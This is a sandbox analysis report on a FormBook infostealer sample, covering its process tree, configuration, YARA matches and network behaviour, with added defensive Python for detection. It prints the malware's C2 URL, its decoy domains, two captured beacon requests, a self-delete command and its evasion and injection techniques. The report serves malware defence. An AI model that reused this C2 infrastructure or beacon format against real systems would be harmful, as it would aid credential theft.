
Analysis Report XhU4EXUp0x.exe

Overview

General Information

Sample Name: XhU4EXUp0x.exe
Analysis ID: 433531
MD5: 49c83eceb8a816b959a778e5f2e78801
SHA1: ead9055c813de47edfec5bc46a0d896df4b4af2e
SHA256: 2f4d0e2ce90ab2c35dcba4c85e38346eae6ac2cef0f939ccdd21cade4d6343ca
Tags: exe, Formbook

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • XhU4EXUp0x.exe (PID: 6968 cmdline: 'C:\Users\user\Desktop\XhU4EXUp0x.exe' MD5: 49C83ECEB8A816B959A778E5F2E78801)
    • XhU4EXUp0x.exe (PID: 6076 cmdline: C:\Users\user\Desktop\XhU4EXUp0x.exe MD5: 49C83ECEB8A816B959A778E5F2E78801)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 6340 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 3416 cmdline: /c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
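The chain above (the sample relaunching its own image, explorer.exe drawn as the child of that second instance because code was injected into it, raserver.exe then spawning cmd.exe to delete the dropper) is exactly what process-creation telemetry catches, even though the report notes that no Sigma rule matched. The following Python is an added example, not part of the Joe Sandbox report: it flags both edges over event records constructed from the tree. The ProcEvent fields are an assumed, simplified schema, not a real EDR or Sysmon format, and the parent PID of the first instance is made up.

```python
"""Flag the FormBook-style execution chain from process-creation telemetry.

Added example, not part of the Joe Sandbox report.  EVENTS is constructed
from the report's process tree (PIDs, images and command lines as listed
there); the field names are an assumed, simplified schema.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from the report's process tree.  The report draws explorer.exe
# under the second sample instance because code was injected into it; in real
# telemetry explorer.exe already exists, so rule 2 below does not rely on
# that edge, only on what explorer.exe itself appears to spawn afterwards.
EVENTS = [
    ProcEvent(6968, 1, r"C:\Users\user\Desktop\XhU4EXUp0x.exe",
              r"'C:\Users\user\Desktop\XhU4EXUp0x.exe'"),
    ProcEvent(6076, 6968, r"C:\Users\user\Desktop\XhU4EXUp0x.exe",
              r"C:\Users\user\Desktop\XhU4EXUp0x.exe"),
    ProcEvent(3424, 6076, r"C:\Windows\explorer.exe", ""),
    ProcEvent(6340, 3424, r"C:\Windows\SysWOW64\raserver.exe",
              r"C:\Windows\SysWOW64\raserver.exe"),
    ProcEvent(3416, 6340, r"C:\Windows\SysWOW64\cmd.exe",
              r"/c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe'"),
    ProcEvent(2216, 3416, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# "cmd /c del <something under C:\Users\...>", with or without quotes
SELF_DELETE = re.compile(r"/c\s+del\s+['\"]?[a-z]:\\users\\", re.IGNORECASE)


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return one finding string per suspicious edge in the tree."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        # 1. A user-writable executable relaunching its own image: the first
        #    step of the hollowing the report flags ("Creates a process in
        #    suspended mode", "Sample uses process hollowing technique").
        if (e.image.lower() == parent.image.lower()
                and "\\users\\" in e.image.lower()):
            findings.append(
                f"self-spawn of {basename(e.image)}: pid {parent.pid} -> pid {e.pid}")
        # 2. cmd.exe deleting a user-writable executable, launched by a
        #    SysWOW64 binary whose own parent is explorer.exe: the injected
        #    host is the only plausible origin of such a chain.
        if basename(e.image) == "cmd.exe" and SELF_DELETE.search(e.cmdline):
            grand = by_pid.get(parent.ppid)
            if ("\\syswow64\\" in parent.image.lower() and grand is not None
                    and basename(grand.image) == "explorer.exe"):
                findings.append(
                    f"self-delete chain: explorer.exe -> {basename(parent.image)} "
                    f"(pid {parent.pid}) -> cmd.exe {e.cmdline}")
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

Rule 2 keys on the shape of the chain rather than on raserver.exe by name, because FormBook picks its SysWOW64 host from a list and the next sample will use a different one.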

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.yellow-wink.com/nff/"], "decoy": ["shinseikai.site", "creditmystartup.com", "howtovvbucks.com", "betterfromthebeginning.com", "oubacm.com", "stonalogov.com", "gentrypartyof8.com", "cuesticksandsupplies.com", "joelsavestheday.com", "llanobnb.com", "ecclogic.com", "miempaque.com", "cai23668.com", "miscdr.net", "twzhhq.com", "bloomandbrewcafe.com", "angcomleisure.com", "mafeeboutique.com", "300coin.club", "brooksranchhomes.com", "konversiondigital.com", "dominivision.com", "superiorshinedetailing.net", "thehomechef.global", "dating-web.site", "gcbsclubc.com", "mothererph.com", "pacleanfuel.com", "jerseryshorenflflagfootball.com", "roberthyatt.com", "wwwmacsports.com", "tearor.com", "american-ai.com", "mkyiyuan.com", "gempharmatechllc.com", "verdijvtc.com", "zimnik-bibo.one", "heatherdarkauthor.net", "dunn-labs.com", "automotivevita.com", "bersatubagaidulu.com", "gorillarecruiting.com", "mikecdmusic.com", "femuveewedre.com", "onyxmodsllc.com", "ooweesports.com", "dezeren.com", "foeweifgoor73dz.com", "sorchaashe.com", "jamiitulivu.com", "jifengshijie.com", "ranchfiberglas.com", "glendalesocialmediaagency.com", "icuvietnam.com", "404hapgood.com", "planetturmeric.com", "danfrem.com", "amazonautomationbusiness.com", "switchfinder.com", "diversifiedforest.com", "findnehomes.com", "rsyueda.com", "colombianmatrimony.com", "evan-dawson.info"]}

Yara Overview

Memory Dumps

Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook (Yara detected FormBook), Author: Joe Security
Rule: Formbook_1 (autogenerated rule brought to you by yara-signator), Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Rule: Formbook (detect Formbook in memory), Author: JPCERT/CC Incident Response Group
Strings:
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook (Yara detected FormBook), Author: Joe Security
Rule: Formbook_1 (autogenerated rule brought to you by yara-signator), Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings: the same ten $sequence_0 to $sequence_9 matches at the same offsets (0x98e8 through 0x1c31a) as in the dump above, i.e. the same unpacked image

Table truncated in this export; the full table has 24 entries.

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.XhU4EXUp0x.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.XhU4EXUp0x.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.XhU4EXUp0x.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x183f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1850c:$sqlite3step: 68 34 1C 7B E1
        • 0x18428:$sqlite3text: 68 38 2A 90 C5
        • 0x1854d:$sqlite3text: 68 38 2A 90 C5
        • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
        3.0.XhU4EXUp0x.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.0.XhU4EXUp0x.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries
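What the listed strings are, and why the same offsets recur across the 0x400000 and 0x15D0000 dumps and the unpacked PEs (they are one and the same image), is easier to see by running the patterns over a buffer. The following Python is an added example, not the report's code and not the rule authors' rules: it copies the patterns printed above, lays them into a constructed buffer at the reported offsets (a real run would read an unpacked dump from disk instead), finds them with a plain byte search, decodes the push immediates of the JPCERT strings, and marks the RDTSC sites, since $sequence_0 decodes to add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, the timing check behind the signature "Tries to detect virtualization through RDTSC time measurements".

```python
"""Search a memory image for the byte patterns the two community rules above
report, and decode what they are.

Added example, not from the report or from the rule authors.  The pattern
list is copied from the report; the image is a constructed buffer (the real
input would be an unpacked dump such as 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack,
read with open(path, "rb").read()).
"""
import re
import struct

# $sequence_N strings of the Formbook_1 (yara-signator) rule, as printed above.
SEQUENCES = {
    "sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "sequence_8": "3C 54 74 04 3C 74 75 F4",
    "sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}
# $sqlite3* strings of the JPCERT/CC rule.  Each is `push imm32` (opcode 68);
# the rule names say which sqlite3 export the constant stands for.
PUSHES = {
    "sqlite3step": "68 34 1C 7B E1",
    "sqlite3text": "68 38 2A 90 C5",
    "sqlite3blob": "68 53 D8 7F 8C",
}
# Offsets the report printed for a subset of the strings; used only to lay
# out the constructed image so that the script reproduces them.
REPORTED = {"sequence_0": [0x98E8, 0x9B52], "sequence_9": [0x1C31A],
            "sqlite3step": [0x183F9, 0x1850C], "sqlite3text": [0x18428, 0x1854D],
            "sqlite3blob": [0x1843B, 0x18563]}


def hexpat(s: str) -> bytes:
    return bytes.fromhex(s.replace(" ", ""))


def build_image() -> bytes:
    """Constructed stand-in for the dump: 0x20000 zero bytes with the
    patterns placed at the offsets the report listed."""
    buf = bytearray(0x20000)
    for name, offs in REPORTED.items():
        pat = hexpat({**SEQUENCES, **PUSHES}[name])
        for off in offs:
            buf[off:off + len(pat)] = pat
    return bytes(buf)


def scan(buf: bytes, patterns: dict) -> dict:
    """Plain byte search (the subset of YARA string matching these rules
    need).  Returns {name: [offsets]} for the patterns that occur."""
    hits = {}
    for name, hexstr in patterns.items():
        offs = [m.start() for m in re.finditer(re.escape(hexpat(hexstr)), buf)]
        if offs:
            hits[name] = offs
    return hits


def push_immediates(patterns: dict) -> dict:
    """Little-endian imm32 of each push: the value to look up in an API-hash table."""
    return {name: struct.unpack("<I", hexpat(h)[1:5])[0]
            for name, h in patterns.items()}


def rdtsc_sites(buf: bytes) -> list:
    """Offsets of RDTSC (0F 31); inside $sequence_0 it sits two bytes in."""
    return [m.start() for m in re.finditer(re.escape(b"\x0f\x31"), buf)]


if __name__ == "__main__":
    image = build_image()
    for name, offs in scan(image, {**SEQUENCES, **PUSHES}).items():
        print(name, [hex(o) for o in offs])
    print({n: hex(v) for n, v in push_immediates(PUSHES).items()})
    print("rdtsc at", [hex(o) for o in rdtsc_sites(image)])
```

Replace build_image() with the bytes of a real dump and the offsets printed by scan() should line up with the report's; if they are shifted by a constant, the dump was taken from a different base address, which is how the 0x15D0000 copy relates to the 0x400000 one.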

          Sigma Overview

          No Sigma rule has matched

          Signature Overview


          AV Detection:

Found malware configuration
Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook (the extracted C2 list and decoy list are reproduced in full under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: XhU4EXUp0x.exe, Virustotal: Detection: 21% (permalink on the original report)
Source: XhU4EXUp0x.exe, ReversingLabs: Detection: 26%
Yara detected FormBook
Source: Yara match, File source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: XhU4EXUp0x.exe, Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

Source: XhU4EXUp0x.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: XhU4EXUp0x.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP, source: explorer.exe, 00000005.00000000.669343721.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\YfQkSBryuS\src\obj\Debug\ProfileOptimization.pdb, source: XhU4EXUp0x.exe
Source: Binary string: wntdll.pdbUGP, source: XhU4EXUp0x.exe, 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, raserver.exe, 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: XhU4EXUp0x.exe, raserver.exe
Source: Binary string: RAServer.pdb, source: XhU4EXUp0x.exe, 00000003.00000002.707590458.000000000169A000.00000004.00000020.sdmp
Source: Binary string: RAServer.pdbGCTL, source: XhU4EXUp0x.exe, 00000003.00000002.707590458.000000000169A000.00000004.00000020.sdmp
Source: Binary string: wscui.pdb, source: explorer.exe, 00000005.00000000.669343721.0000000005A00000.00000002.00000001.sdmp
Of these PDB paths only ProfileOptimization.pdb belongs to the submitted file itself; wntdll.pdb, RAServer.pdb and wscui.pdb are the debug references of ntdll.dll, raserver.exe and wscui.cpl, which the listed processes had mapped or read into memory. The obj\Debug path is an MSBuild debug-build output location, consistent with a managed loader wrapped around the native FormBook payload.
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h (0_2_0B4EB2F0)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h (0_2_0B4EBD68)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h (0_2_0B4EB2E1)
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 4x nop then pop edi (3_2_0040E442)
Source: C:\Windows\SysWOW64\raserver.exe, Code function: 4x nop then pop edi (12_2_00A9E442)

          Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.yellow-wink.com/nff/
Source: global traffic, HTTP traffic detected:
  GET /nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwH HTTP/1.1
  Host: www.gentrypartyof8.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: global traffic, HTTP traffic detected:
  GET /nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwH HTTP/1.1
  Host: www.rsyueda.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Both captured requests use the configured C2 path /nff/ but go to gentrypartyof8.com and rsyueda.com, which are entries of the decoy list, not the C2 list; the configured C2 host www.yellow-wink.com was not contacted during the run. Neither request carries a User-Agent header, which is what the signature "HTTP GET or POST without a user agent" refers to.
IP address seen in connection with other malware
Source: Joe Sandbox View, IP Address: 66.235.200.146
Internet Provider seen in connection with other malware
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View, ASN Name: LEASEWEB-USA-SEA-10US
Source: unknown, DNS traffic detected: queries for: www.gentrypartyof8.com
Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmp, strings found in binary or memory:
  • http://fontfabrik.com
  • http://www.apache.org/licenses/LICENSE-2.0
  • http://www.carterandcone.coml
  • http://www.fontbureau.com
  • http://www.fontbureau.com/designers
  • http://www.fontbureau.com/designers/?
  • http://www.fontbureau.com/designers/cabarga.htmlN
  • http://www.fontbureau.com/designers/frere-user.html
  • http://www.fontbureau.com/designers8
  • http://www.fontbureau.com/designers?
  • http://www.fontbureau.com/designersG
  • http://www.fonts.com
  • http://www.founder.com.cn/cn
  • http://www.founder.com.cn/cn/bThe
  • http://www.founder.com.cn/cn/cThe
  • http://www.galapagosdesign.com/DPlease
  • http://www.galapagosdesign.com/staff/dennis.htm
  • http://www.goodfont.co.kr
  • http://www.jiyu-kobo.co.jp/
  • http://www.sajatypeworks.com
  • http://www.sakkal.com
  • http://www.sandoll.co.kr
  • http://www.tiro.com
  • http://www.typography.netD
  • http://www.urwpp.deDPlease
  • http://www.zhongyicts.com.cn
Source: explorer.exe, 00000005.00000000.660621066.0000000002B50000.00000002.00000001.sdmp, string found in binary or memory: http://www.%s.comPA
Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmp, string found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp, string found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: XhU4EXUp0x.exe, 00000000.00000002.653237651.00000000009F0000.00000004.00000020.sdmp, binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
The explorer.exe URLs are font vendor and licence strings from font metadata mapped in the host process and are not indicators for this sample (the trailing characters such as "N", "8", "G" and "DPlease" are adjacent bytes picked up by the string scanner). The three strings from the sample's own process are a .NET claims-type URI, a Bootstrap CDN URL and an application-compatibility hook entry; none of them is a contacted host.
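Both captured requests went to hosts from the decoy list rather than to the configured C2 host, which is the point of FormBook's decoy traffic: block-listing only the observed domains misses www.yellow-wink.com, while the shape of the request (the configured path /nff/, two query parameters, Connection: close, no User-Agent) is the same for decoys and C2. The following Python is an added example, not the report's code and not part of any FormBook tooling: it loads the configuration printed above (decoy list shortened to the entries needed here), parses the two captured requests plus one constructed control request, and classifies each against the configuration.

```python
"""Use the extracted FormBook configuration as a detection source and check
captured HTTP requests against it.

Added example, not part of the report or of any FormBook tooling.  CONFIG is
the configuration printed under Malware Configuration (decoy list shortened);
REQUESTS are the two captured GET requests re-typed as raw HTTP plus one
constructed control request.  Nothing is fetched from the network.
"""
import json
from urllib.parse import parse_qsl, urlsplit

CONFIG = json.loads('''{"C2 list": ["www.yellow-wink.com/nff/"],
 "decoy": ["shinseikai.site", "creditmystartup.com", "gentrypartyof8.com",
           "rsyueda.com", "evan-dawson.info"]}''')

REQUESTS = [  # the two "HTTP traffic detected" entries above, as raw HTTP
    "GET /nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c"
    "&7nSX=f2MHEhOHwH HTTP/1.1\r\nHost: www.gentrypartyof8.com\r\nConnection: close\r\n\r\n",
    "GET /nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L"
    "&7nSX=f2MHEhOHwH HTTP/1.1\r\nHost: www.rsyueda.com\r\nConnection: close\r\n\r\n",
    # constructed control request that is not FormBook traffic
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: curl/8.0\r\n\r\n",
]


def c2_entries(config):
    """'C2 list' entries are host + path without a scheme; split them."""
    out = []
    for entry in config["C2 list"]:
        host, _, path = entry.partition("/")
        out.append((host.lower(), "/" + path))
    return out


def parse_request(raw):
    """Minimal HTTP/1.1 request parser: request line, headers, query params."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method, "path": url.path,
            "params": dict(parse_qsl(url.query)), "headers": headers}


def classify(raw, config):
    """Return (verdict, traits); verdict is 'c2', 'decoy' or 'unrelated'."""
    req = parse_request(raw)
    host = req["headers"].get("host", "").lower()
    bare = host[4:] if host.startswith("www.") else host   # decoys are listed without www.
    c2 = c2_entries(config)
    c2_paths = {p for _, p in c2}
    if any(host == h and req["path"] == p for h, p in c2):
        verdict = "c2"
    elif req["path"] in c2_paths and bare in {d.lower() for d in config["decoy"]}:
        verdict = "decoy"
    else:
        verdict = "unrelated"
    traits = {  # the beacon shape a rule can key on even when the host is new
        "no_user_agent": "user-agent" not in req["headers"],
        "connection_close": req["headers"].get("connection", "").lower() == "close",
        "c2_path": req["path"] in c2_paths,
        "two_query_params": len(req["params"]) == 2,
    }
    return verdict, traits


def summarize(requests, config):
    return [classify(r, config)[0] for r in requests]


if __name__ == "__main__":
    for r in REQUESTS:
        print(parse_request(r)["headers"].get("host"), classify(r, CONFIG))
```

For blocking, feed both the C2 host and the whole decoy list into the block list; for hunting, the four traits together are a tighter match than any single domain, since the decoy set changes per build while the URI scheme does not.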

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match; the same 13 file sources (nine memory dumps, four unpacked PEs) as listed under AV Detection above.

          System Summary:

Malicious sample detected (through community Yara rule)
Each of the following sources matched both community rules, "autogenerated rule brought to you by yara-signator" (Author: Felix Bilstein - yara-signator at cocacoding dot com) and "detect Formbook in memory" (Author: JPCERT/CC Incident Response Group):
Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORY
Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORY
Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORY
Source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPE
Source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPE
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code functions (process 3, listed as the report prints them, with the APIs each function calls):
  • 3_2_00419D50 NtCreateFile
  • 3_2_00419E00 NtReadFile
  • 3_2_00419E80 NtClose
  • 3_2_00419F30 NtAllocateVirtualMemory
  • 3_2_00419DA9 NtReadFile
  • 3_2_00419E7A NtClose
  • 3_2_00419F2D NtAllocateVirtualMemory
  • 3_2_019999A0 NtCreateSection, LdrInitializeThunk
  • 3_2_01999910 NtAdjustPrivilegesToken, LdrInitializeThunk
  • 3_2_019998F0 NtReadVirtualMemory, LdrInitializeThunk
  • 3_2_01999840 NtDelayExecution, LdrInitializeThunk
  • 3_2_01999860 NtQuerySystemInformation, LdrInitializeThunk
  • 3_2_01999A00 NtProtectVirtualMemory, LdrInitializeThunk
  • 3_2_01999A20 NtResumeThread, LdrInitializeThunk
  • 3_2_01999A50 NtCreateFile, LdrInitializeThunk
  • 3_2_019995D0 NtClose, LdrInitializeThunk
  • 3_2_01999540 NtReadFile, LdrInitializeThunk
